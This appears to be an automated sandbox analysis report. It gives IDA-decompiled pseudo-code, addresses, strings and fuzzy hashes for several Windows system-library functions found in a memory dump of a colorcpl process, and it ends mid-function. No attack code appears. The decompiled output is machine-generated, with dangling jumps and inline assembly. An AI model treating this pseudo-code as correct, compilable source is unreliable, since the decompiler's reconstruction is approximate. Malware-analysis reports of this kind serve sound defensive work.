			E0437360F(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _v96;
				intOrPtr* _t41;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t53;
				signed int _t55;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t73;
				intOrPtr _t75;
				void* _t76;
				signed int _t80;

				_t69 = __edx;
				_t82 = (_t80 & 0xfffffff8) - 0x5c;
				_v8 =  *0x443b370 ^ (_t80 & 0xfffffff8) - 0x0000005c;
				_t41 = _a4;
				_v96 = _t41;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(_t41 == 0) {
					L23:
					_t75 = 0xc000000d;
					goto L10;
				} else {
					_t75 = 0;
					 *_t41 = 0;
					if(__edx == 0) {
						goto L23;
					} else {
						_t73 = __edx + 4;
						_t59 =  *_t73;
						while(_t59 != _t73) {
							_t68 = _t59 - 8;
							if( *_t68 != 0x74736c46) {
								_v72 = 1;
								_v68 = 1;
								_v88 = 1;
								_push( &_v92);
								_v84 = _t75;
								_v76 = 4;
								_v64 = _t73;
								_v60 = _t68;
								_v92 = 0xc0150015;
								L04398A60(_t68, _t69);
								_t61 = _t59 - 8;
							}
							if( *(_t61 + 4) == 0x20) {
								L22:
								_t59 =  *_t59;
								_push(1);
								_pop(1);
								continue;
							} else {
								_t53 = _t75;
								_t69 = _t61;
								while(( *(_t69 + 0x20) & 0x00000004) == 0) {
									_t53 = _t53 + 1;
									_t69 = _t69 + 0x30;
									if(_t53 < 0x20) {
										continue;
									} else {
										goto L22;
									}
									goto L24;
								}
								_t55 =  *(_t61 + 4) + 1;
								 *(_t61 + 4) = _t55;
								 *(_t61 + 0x14) =  !_t55;
								_t12 = _t69 + 0x18; // 0x100000016
								_t61 = _t12;
								if(_t61 == 0) {
									goto L22;
								} else {
									L9:
									 *((intOrPtr*)(_t65 + 8)) = 8;
									 *_v96 = _t65;
									L10:
									_pop(_t72);
									_pop(_t76);
									_pop(_t58);
									return E04384B50(_t75, _t58, _v8 ^ _t82, _t69, _t72, _t76);
								}
							}
							goto L24;
						}
						_t60 = E04355D90(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t75, 0x618);
						if(_t60 == 0) {
							_t75 = 0xc0000017;
							goto L10;
						} else {
							L18();
							 *((intOrPtr*)(_t60 + 4)) = 1;
							_t18 = _t60 + 0x18; // 0x18
							_t65 = _t18;
							 *((intOrPtr*)(_t60 + 0x14)) = 0xfffffffe;
							_t48 = _t60 + 8;
							_t69 =  *_t73;
							if( *((intOrPtr*)(_t69 + 4)) != _t73) {
								_t66 = 3;
								asm("int 0x29");
								 *_t66 = 0x74736c46;
								 *((intOrPtr*)(_t66 + 0x10)) = 0;
								_t67 = _t66 + 0x1c;
								_t49 = 0x20;
								do {
									 *((intOrPtr*)(_t67 - 4)) = 0;
									 *_t67 = 0;
									_t67 = _t67 + 0x30;
									 *((intOrPtr*)(_t67 - 0x2c)) = 0xc;
									 *((intOrPtr*)(_t67 - 0x28)) = 0;
									_t49 = _t49 - 1;
								} while (_t49 != 0);
								return _t49;
							} else {
								 *_t48 = _t69;
								 *((intOrPtr*)(_t48 + 4)) = _t73;
								 *((intOrPtr*)(_t69 + 4)) = _t48;
								 *_t73 = _t48;
								goto L9;
							}
						}
					}
				}
				L24:
			}

0x0437360f
0x04373617
0x04373621
0x04373625
0x04373628
0x0437362b
0x0437362c
0x0437362d
0x04373630
0x043b2969
0x043b2969
0x00000000
0x04373636
0x04373636
0x04373638
0x0437363c
0x00000000
0x04373642
0x04373642
0x04373647
0x0437364a
0x0437364e
0x04373657
0x043b2925
0x043b2929
0x043b292d
0x043b2935
0x043b2936
0x043b293a
0x043b2942
0x043b2946
0x043b294a
0x043b2952
0x043b2957
0x043b2957
0x04373661
0x043b295f
0x043b295f
0x043b2961
0x043b2963
0x00000000
0x04373667
0x04373667
0x04373669
0x0437366b
0x043736ab
0x043736ac
0x043736b2
0x00000000
0x043736b4
0x00000000
0x043736b4
0x00000000
0x043736b2
0x04373674
0x04373675
0x0437367a
0x0437367d
0x0437367d
0x04373682
0x00000000
0x04373688
0x04373688
0x0437368c
0x04373693
0x04373695
0x0437369b
0x0437369c
0x0437369d
0x043736a8
0x043736a8
0x04373682
0x00000000
0x04373661
0x043736cd
0x043736d1
0x04373701
0x00000000
0x043736d3
0x043736d5
0x043736da
0x043736e1
0x043736e1
0x043736e4
0x043736eb
0x043736ee
0x043736f3
0x0437370a
0x0437370b
0x0437370f
0x04373717
0x0437371a
0x0437371d
0x0437371e
0x0437371e
0x04373721
0x04373723
0x04373726
0x0437372d
0x04373730
0x04373730
0x04373735
0x043736f5
0x043736f5
0x043736f7
0x043736fa
0x043736fd
0x00000000
0x043736fd
0x043736f3
0x043736d1
0x0437363c
0x00000000

Strings

Flst, xrefs: 04373651

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 553462952b53cfb120204a5a8f66e245b1fc08242f1d6995fd1b8d30e902d1b2
Instruction ID: c03fbfce5fa9aa4b448f2436b80c511b1935e3b3402c4106e12d5b12369aff4f
Opcode Fuzzy Hash: 553462952b53cfb120204a5a8f66e245b1fc08242f1d6995fd1b8d30e902d1b2
Instruction Fuzzy Hash: EC41B7B1604301DFE324CF18C0C4A66FBE4EF89714F1492AEE9998B281E771E842CB91

Uniqueness

Uniqueness Score: -1.00%

Function 043D66D0 Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E043D66D0(void* __ecx, signed int _a4, intOrPtr _a8, char* _a12) {
				signed int _v8;
				char _v112;
				char _v113;
				char _v120;
				signed int _v124;
				char* _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t35;
				signed char _t40;
				signed char _t46;
				intOrPtr _t49;
				void* _t55;
				signed char _t59;
				void* _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				signed int _t65;

				_v8 =  *0x443b370 ^ _t65;
				_t35 = _a12;
				_t63 = _a4;
				_v128 = _t35;
				_t62 =  &_v112;
				 *_t35 = 1;
				if(_a8 != 0 || _t63 == 0) {
					_t36 = 0xc000000d;
				} else {
					_v113 = 0;
					_push( &_v120);
					_push(0x68);
					_push(_t62);
					_push(0x10);
					_push(_t63);
					_t55 = E04383F60();
					if(_t55 >= 0) {
						L7:
						_t40 =  *(_t62 + 2) & 0x0000ffff;
						_t59 = _t40;
						if((_t40 & 0x00000010) == 0) {
							L16:
							 *_v128 = 0;
						} else {
							_t63 =  *(_t62 + 0xc);
							if(_t59 < 0) {
								asm("sbb esi, esi");
								_t63 =  ~_t63 & _t63 + _t62;
							}
							if(_t63 != 0) {
								_v124 = _v124 & 0x00000000;
								while(1) {
									_t60 = E04367FD0(_t63, 0x11,  &_v124);
									if(_t60 == 0) {
										goto L16;
									}
									if(( *(_t60 + 1) & 0x00000008) != 0) {
										continue;
									} else {
										_t46 =  *((intOrPtr*)(_t60 + 9));
										if(_t46 != 0 &&  *((intOrPtr*)(_t60 + 0xc + (_t46 & 0x000000ff) * 4)) >= 0x2000) {
											goto L16;
										}
									}
									goto L17;
								}
							}
							goto L16;
						}
						L17:
						if(_v113 != 0) {
							goto L18;
						}
						goto L19;
					} else {
						if(_t55 == 0xc0000023) {
							_t49 =  *0x4435d78; // 0x0
							_t62 = E04355D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49 + 0x140000, _v120);
							if(_t62 != 0) {
								_v113 = 1;
								_push( &_v120);
								_push(0x68);
								_push(_t62);
								_push(0x10);
								_push(_t63);
								_t55 = E04383F60();
								if(_t55 < 0) {
									L18:
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
								} else {
									goto L7;
								}
								L19:
								_t36 = _t55;
							} else {
								_t36 = _t55 - 0xc;
							}
						}
					}
				}
				return E04384B50(_t36, _t55, _v8 ^ _t65, _t61, _t62, _t63);
			}

0x043d66df
0x043d66e6
0x043d66eb
0x043d66ef
0x043d66f2
0x043d66f5
0x043d66f8
0x043d67e0
0x043d6706
0x043d6709
0x043d670d
0x043d670e
0x043d6712
0x043d6713
0x043d6715
0x043d671b
0x043d671f
0x043d6770
0x043d6770
0x043d6774
0x043d6778
0x043d67bf
0x043d67c2
0x043d677a
0x043d677a
0x043d6780
0x043d6787
0x043d6789
0x043d6789
0x043d678d
0x043d678f
0x043d6793
0x043d679f
0x043d67a3
0x00000000
0x00000000
0x043d67a9
0x00000000
0x043d67ab
0x043d67ab
0x043d67b0
0x00000000
0x00000000
0x043d67b0
0x00000000
0x043d67a9
0x043d6793
0x00000000
0x043d678d
0x043d67c5
0x043d67c9
0x00000000
0x00000000
0x00000000
0x043d6721
0x043d6727
0x043d672d
0x043d6749
0x043d674d
0x043d675a
0x043d675e
0x043d675f
0x043d6761
0x043d6762
0x043d6764
0x043d676a
0x043d676e
0x043d67cb
0x043d67d7
0x00000000
0x00000000
0x00000000
0x043d67dc
0x043d67dc
0x043d674f
0x043d674f
0x043d674f
0x043d674d
0x043d6727
0x043d671f
0x043d67f3

Strings

#, xrefs: 043D6721

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: d5859f2ca27f24191164f51a74af86c746f685ae77d13892014d46f90fffde69
Instruction ID: 00f5262c17c9c4a5aed858a9beea6dfcf744a33b8ad8fab57b7647a8701be9d1
Opcode Fuzzy Hash: d5859f2ca27f24191164f51a74af86c746f685ae77d13892014d46f90fffde69
Instruction Fuzzy Hash: FF31FB3260075D9AEB22DF68D855FEEB7B89F45B08F14506CF8509B282E775F804CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043BC6F2 Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E043BC6F2(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04382B00();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = E04355D90(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04382B00();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x043bc701
0x043bc704
0x043bc707
0x043bc70d
0x043bc70e
0x043bc712
0x043bc717
0x043bc71a
0x043bc71b
0x043bc71c
0x043bc71d
0x043bc71f
0x043bc722
0x043bc729
0x043bc72a
0x043bc72b
0x043bc732
0x043bc736
0x043bc738
0x043bc738
0x043bc743
0x043bc7ac
0x043bc7ae
0x043bc7b0
0x043bc7c0
0x043bc7c2
0x043bc7cf
0x043bc7cf
0x043bc7d5
0x043bc7da
0x043bc7da
0x043bc7b5
0x043bc7ba
0x00000000
0x043bc7ba
0x043bc758
0x043bc75c
0x043bc766
0x043bc767
0x043bc76d
0x043bc76e
0x043bc770
0x043bc771
0x043bc779
0x043bc77d
0x043bc7be
0x00000000
0x043bc7be
0x043bc783
0x043bc78b
0x043bc78b
0x043bc790
0x043bc794
0x00000000
0x043bc796
0x043bc799
0x043bc799
0x043bc7a3
0x043bc7a5
0x043bc7a5
0x00000000
0x043bc7a3
0x043bc794
0x043bc75e
0x00000000

Strings

BinaryName, xrefs: 043BC722

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 92b03a8aa4e00141db50b669597243847a27731a572503ecb5c7a887453532cb
Instruction ID: e42519b5bce77054db59cc6ba4bf3e628b3d3f9c34b2f265409a4f08e2443cb9
Opcode Fuzzy Hash: 92b03a8aa4e00141db50b669597243847a27731a572503ecb5c7a887453532cb
Instruction Fuzzy Hash: 3E31D476900519AFEB25DA58C856EAFB7B4EF81720F11616DEE41A7A50D730BE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 043C85AA Relevance: 1.3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E043C85AA(intOrPtr* __ecx) {
				intOrPtr _t9;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t9 =  *[fs:0x30];
				_t23 = __ecx;
				if(( *(_t9 + 0x68) & 0x00000100) == 0 ||  *0x4439231 == 0) {
					return _t9;
				} else {
					E0434FED0(0x4435220);
					if(E043C9174( *((intOrPtr*)(_t23 + 0x18))) == 0) {
						_t20 = _t23;
						if(E043C8E06(_t23) < 0) {
							L9:
							_push(0x4435220);
							return E0434E740(_t20);
						}
						_t22 =  *0x4435240; // 0x0
						while(_t22 != 0x4435240) {
							_t17 =  *((intOrPtr*)(_t22 + 0x1c));
							_t22 =  *_t22;
							if(_t17 != 0) {
								_t20 = _t17;
								 *0x44391e0( *((intOrPtr*)(_t23 + 0x30)),  *((intOrPtr*)(_t23 + 0x18)),  *((intOrPtr*)(_t23 + 0x20)), _t23);
								 *_t17();
							}
						}
						goto L9;
					}
					E0433B910("AVRF: AVrfDllUnloadNotification called for a provider (%p) \n", _t23);
					_pop(_t20);
					asm("int3");
					goto L9;
				}
			}

0x043c85aa
0x043c85ba
0x043c85bc
0x043c8632
0x043c85c7
0x043c85cc
0x043c85db
0x043c85ed
0x043c85f6
0x043c8625
0x043c8625
0x00000000
0x043c862a
0x043c85f8
0x043c861d
0x043c8600
0x043c8603
0x043c8607
0x043c860d
0x043c8615
0x043c861b
0x043c861b
0x043c8607
0x00000000
0x043c861d
0x043c85e3
0x043c85e9
0x043c85ea
0x00000000
0x043c85ea

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 043C85DE

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 489813b197b6ea75f9d4d8e060a3a49e91fcd1171b2481d12fde92512cb462c3
Instruction ID: e1e98abaa416a37bb2a4a80d8dc1507f193ad4618c179e4310a1f4fccf845b83
Opcode Fuzzy Hash: 489813b197b6ea75f9d4d8e060a3a49e91fcd1171b2481d12fde92512cb462c3
Instruction Fuzzy Hash: 6F012B31300600ABFB38BE11E844A56BB65EF44B57F14381DE64117452CB74BD50CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0439717A Relevance: .7, Instructions: 705
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E0439717A(signed int __ecx, signed int __edx, signed int _a4, signed short _a8, signed short _a12) {
				unsigned int _v5;
				signed int _v6;
				signed int _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed short _v32;
				signed int _v36;
				signed int* _v40;
				signed short _v44;
				signed int _v48;
				signed short _v52;
				signed int _v56;
				char _v60;
				unsigned int _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t250;
				signed short _t252;
				signed short _t253;
				signed short _t254;
				unsigned int _t267;
				signed short _t270;
				signed int _t271;
				signed int* _t274;
				signed int _t276;
				signed int _t281;
				signed char _t282;
				signed short _t283;
				signed short _t289;
				signed char _t290;
				signed int _t295;
				signed short _t298;
				signed short* _t299;
				signed int _t305;
				signed short _t307;
				signed int _t310;
				signed short _t315;
				void* _t318;
				signed int _t322;
				signed short _t323;
				signed short _t328;
				signed char* _t329;
				signed char _t330;
				signed int _t335;
				signed int _t344;
				signed short _t348;
				signed short _t351;
				signed char _t353;
				signed char _t355;
				signed short _t356;
				signed short _t358;
				signed short _t359;
				signed short _t361;
				unsigned int _t362;
				signed int _t363;
				signed int _t370;
				signed int _t372;
				signed short _t373;
				signed short _t374;
				unsigned int _t378;
				void* _t387;
				unsigned int _t392;
				void* _t393;
				signed short _t395;
				signed int _t396;
				signed short _t397;
				signed int* _t406;
				intOrPtr _t409;
				signed short _t425;
				unsigned int _t430;
				intOrPtr* _t431;
				unsigned int _t437;
				void* _t442;
				void* _t443;
				signed short* _t444;
				unsigned int _t445;
				signed short _t449;
				unsigned int _t456;
				void* _t463;
				signed int _t476;
				void* _t478;
				signed char _t480;
				signed short _t481;
				void* _t483;
				signed int _t486;
				signed int _t491;
				signed int* _t492;
				signed short* _t494;
				void* _t497;
				signed short _t498;
				signed short _t499;
				intOrPtr _t504;
				signed int _t509;
				unsigned int _t511;
				signed int _t519;
				signed short _t521;
				signed int _t523;
				signed short _t527;
				signed int _t528;
				signed int _t531;
				signed int _t535;
				signed int _t536;
				signed int _t541;
				signed short _t542;
				signed short* _t545;
				signed char* _t546;
				unsigned int _t547;
				signed short _t550;
				void* _t552;
				signed int _t553;
				signed short _t555;

				_t535 = __ecx;
				_t378 = 0;
				_t249 = __edx;
				_v12 = __ecx;
				_v20 = __edx;
				_t518 = 0;
				if( *((intOrPtr*)(__ecx + 8)) != 0xddeeddee) {
					__eflags =  *(__ecx + 0x44) & 0x01000000;
					if(( *(__ecx + 0x44) & 0x01000000) != 0) {
						L148:
						_t250 = E04353C60(_t535, _t518, _t249);
						_t519 = _t250 & 0x000000ff;
						__eflags = _t250;
						if(_t250 == 0) {
							goto L7;
						}
						L149:
						_t252 = _a12;
						__eflags = _t252;
						if(_t252 != 0) {
							__eflags = 0;
							 *_t252 = 0;
						}
						_t253 = _a8;
						__eflags = _t253;
						if(_t253 != 0) {
							 *_t253 = _t378;
						}
						_t254 = E04353C20(_t535);
						__eflags = _t254;
						if(_t254 != 0) {
							__eflags = _a4 & 0x10000000;
							if((_a4 & 0x10000000) == 0) {
								E043FE8B1(_t535, _v20);
							}
						}
						goto L7;
					}
					__eflags =  *(__ecx + 0x48) & 0x00000001;
					if(__eflags == 0) {
						__eflags = __edx & 0x00000007;
						if((__edx & 0x00000007) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(__edx);
							_t387 = 9;
							E04405FED(_t387, __ecx);
						} else {
							_t518 = __edx - 8;
							__eflags =  *(_t518 + 7) - 5;
							if( *(_t518 + 7) == 5) {
								_t518 = _t518 - (( *(_t518 + 6) & 0x000000ff) << 3);
								__eflags = _t518;
							}
							__eflags =  *(_t518 + 7) & 0x0000003f;
							if(( *(_t518 + 7) & 0x0000003f) == 0) {
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_t463 = 8;
								E04405FED(_t463, _t535);
								_t518 = _t378;
							}
						}
					} else {
						_t518 = E0433A4D2(0, __ecx, __edx, 0, __ecx, __eflags);
					}
					__eflags = _t518;
					if(_t518 != 0) {
						_t249 = _v20;
						__eflags =  *((char*)(_t249 - 1)) - 5;
						if( *((char*)(_t249 - 1)) != 5) {
							L59:
							__eflags =  *(_t518 + 7) - _t378;
							if( *(_t518 + 7) >= _t378) {
								goto L148;
							}
							_t392 = _t518 >> 0x00000003 ^  *_t518 ^  *0x4436964 ^ _t535;
							__eflags = _t392;
							if(_t392 != 0) {
								L146:
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_t393 = 3;
								E04405FED(_t393, _t535);
								L65:
								_t519 = 1;
								goto L149;
							}
							_t395 =  *(_t518 - (_t392 >> 0xd));
							_v16 = _t395;
							__eflags = _t395;
							if(_t395 == 0) {
								goto L146;
							}
							_t536 =  *(_t395 + 4);
							_t476 =  *(_t518 + 4) >> 0x00000008 & 0x0000ffff;
							_v24 = _t536;
							_v32 = _t378;
							_v36 = _t476;
							_t396 =  *( *((intOrPtr*)( *_t395)) + 0xc);
							_v44 = _t396;
							_t267 =  *(_t536 + 0x10) ^ _t396 ^ _t536 ^  *0x4436964;
							__eflags = (_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 - _t518;
							if((_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 == _t518) {
								_t270 = E04353C40();
								__eflags = _t270;
								if(_t270 == 0) {
									_t271 = 0x7ffe0380;
								} else {
									_t271 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								_t478 = 1;
								__eflags =  *_t271 - _t378;
								if( *_t271 != _t378) {
									_t271 =  *[fs:0x30];
									__eflags =  *(_t271 + 0x240) & 1;
									if(( *(_t271 + 0x240) & 1) != 0) {
										_t93 = _t518 + 8; // 0x8
										_t271 = E043FF247( *((intOrPtr*)(_v44 + 0xc)), _t93, 2);
										_t478 = 1;
										__eflags = 1;
									}
								}
								__eflags = _t478 -  *0x7ffe036a;
								_t397 = _t378;
								_v44 = _t397;
								asm("sbb eax, eax");
								_v48 = _t271 & 0x00000064;
								_t274 = _v16 + 0x10;
								_v40 = _t274;
								while(1) {
									_t541 =  *_t274;
									_t276 = _t541 >> 0x10;
									_v28 = _t541;
									__eflags = _t276 & 0x00008000;
									if((_t276 & 0x00008000) != 0) {
										goto L77;
									}
									asm("lock cmpxchg [esi], ecx");
									_t542 = _v28;
									__eflags = _t541 - _t542;
									if(_t541 == _t542) {
										L79:
										 *(_t518 + 7) = 0x80;
										__eflags = _t542 - 0xffffffff;
										if(_t542 != 0xffffffff) {
											_t521 = _v16;
											asm("btr [eax], ecx");
											__eflags =  *((intOrPtr*)(_t521 + 0xc)) - _t378;
											if( *((intOrPtr*)(_t521 + 0xc)) == _t378) {
												L88:
												_t281 = (_t542 & 0x0000ffff) + _v32 + 0x00000001 | _v36 << 0x00000010;
												_t545 =  *_t521;
												__eflags = _t281 -  *(_t521 + 0x18);
												if(_t281 !=  *(_t521 + 0x18)) {
													L127:
													 *(_t521 + 0x10) = _t281;
													_t282 =  *(_t521 + 0x1c);
													__eflags = _t282 & 0x00000002;
													if((_t282 & 0x00000002) != 0) {
														L64:
														_t535 = _v12;
														goto L65;
													}
													_t283 = E04353AF6(_t545, _t521);
													__eflags = _t283;
													if(_t283 == 0) {
														goto L64;
													}
													_t219 = _t521 + 0x1c; // 0x4
													_t546 = _t219;
													while(1) {
														_t480 =  *_t546;
														__eflags = _t480;
														if(_t480 == 0) {
															goto L64;
														}
														__eflags = _t480 & 0x00000002;
														if((_t480 & 0x00000002) != 0) {
															goto L64;
														}
														asm("lock cmpxchg [esi], ecx");
														__eflags = _t480 - _t480;
														if(_t480 != _t480) {
															continue;
														}
														_t406 =  *_t521;
														_t547 = _t378;
														_v40 = _t406;
														do {
															_t289 = _t406 + ((( *(_t406 + 0x5e) & 0x0000ffff) + _t547 & 0x0000000f) + 2) * 4;
															_t481 =  *_t289;
															_v44 = _t289;
															__eflags = _t481;
															if(_t481 != 0) {
																_t290 =  *(_t481 + 0x1c);
																__eflags = _t290 & 0x00000001;
																if((_t290 & 0x00000001) != 0) {
																	goto L140;
																}
																asm("lock cmpxchg [edi], ecx");
																_t521 = _v16;
																__eflags = _t481 - _t481;
																if(_t481 == _t481) {
																	_t523 = 0xfffffffd;
																	_t295 =  *(_t481 + 0x1c);
																	do {
																		__eflags = _t295 & _t523;
																		asm("lock cmpxchg [esi], ecx");
																	} while ((_t295 & _t523) != 0);
																	__eflags = _t295 - 2;
																	if(_t295 != 2) {
																		goto L64;
																	}
																	_t409 =  *( *_t481);
																	 *_t481 = _t378;
																	_t483 = _t481 + 0x20;
																	L81:
																	E043520E0(_t409, _t483);
																	goto L64;
																}
																L139:
																_t406 = _v40;
																goto L140;
															}
															asm("lock cmpxchg [edx], ecx");
															__eflags = 0;
															if(0 == 0) {
																goto L64;
															}
															goto L139;
															L140:
															_t547 = _t547 + 1;
															__eflags = _t547 - 0x10;
														} while (_t547 < 0x10);
														_t235 =  *_t521 + 0x5c; // 0x56ff8bc3
														_t239 = _t521 + 0x20; // 0x8
														_t483 = _t239;
														_t409 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t521) + 0xc)) + 0x3c0 + ( *_t235 & 0x0000ffff) * 4)) + 0x48;
														goto L81;
													}
													goto L64;
												}
												_v36 =  *((intOrPtr*)( *_t545 + 0x10));
												_v44 = _t545[0x2c];
												_t417 = _t545[0x2a];
												__eflags = _t417 - _t478;
												if(_t417 != _t478) {
													L92:
													_t298 =  *_t521;
													_v44 = _t298;
													_t299 = _t298 + 4;
													_t550 =  *_t299;
													 *_t299 = 0;
													__eflags = _t550;
													if(_t550 == 0) {
														L118:
														__eflags =  *(_t521 + 0x16) & 0x00000003;
														_t551 =  *( *_v44 + 0xc);
														_v44 =  *( *_v44 + 0xc);
														_v48 =  *_t521;
														if(( *(_t521 + 0x16) & 0x00000003) != 0) {
															_v56 =  *((intOrPtr*)(_t521 + 4)) + 0x0000101f & 0xfffff000;
															_t315 = E04400E2D(_t521);
															_push( &_v60);
															_t425 = ( *(_t521 + 0x18) & 0x0000ffff) * (_t315 & 0x0000ffff) << 3;
															__eflags = _t425;
															_v52 = _t425;
															_t318 = E0433F0E1( *((intOrPtr*)(_t551 + 0xc)), _t478);
															_t417 = _t425;
															_push(_t318);
															_push( &_v52);
															_push( &_v56);
															_push(0xffffffff);
															E04382EB0();
														}
														 *( *((intOrPtr*)(_t521 + 4)) + 0xc) = _t378;
														E0435252B(_t551,  *((intOrPtr*)(_t521 + 4)), _t417);
														_t305 =  *(_t521 + 0x18) & 0x0000ffff;
														_v36 = _t305;
														_t307 = _v48 + 0x50;
														__eflags = _t307;
														_v36 =  ~_t305;
														_v32 = _t307;
														goto L121;
														do {
															do {
																L121:
																_t552 =  *_t307;
																_t486 =  *((intOrPtr*)(_t307 + 4));
																_v48 = _t486;
																asm("lock cmpxchg8b [edi]");
																__eflags = _t552 - _t552;
																_t307 = _v32;
															} while (_t552 != _t552);
															__eflags = _t486 - _v48;
														} while (_t486 != _v48);
														_t527 = _v16;
														_t378 = 0;
														__eflags = 0;
														 *((intOrPtr*)(_t527 + 4)) = 0;
														asm("lock inc dword [eax+0x20]");
														 *((intOrPtr*)(_t527 + 0x10)) = 0;
														_t213 = _t527 + 0x1c; // 0x4
														_t553 = 0xfffffffe;
														_t310 =  *_t213;
														do {
															__eflags = _t310 & _t553;
															asm("lock cmpxchg [edx], ecx");
														} while ((_t310 & _t553) != 0);
														__eflags = _t310 - 1;
														if(_t310 != 1) {
															goto L64;
														}
														_t214 = _t527 + 0x20; // 0x8
														_t483 = _t214;
														_t409 =  *((intOrPtr*)( *_t527));
														 *_t527 = 0;
														goto L81;
													}
													_t144 = _t550 + 0x1c; // 0x1c
													_t528 = 0xfffffff9;
													_t322 =  *_t144;
													do {
														__eflags = _t322 & _t528;
														asm("lock cmpxchg [edx], ecx");
													} while ((_t322 & _t528) != 0);
													_t521 = _v16;
													__eflags = _t322 - 6;
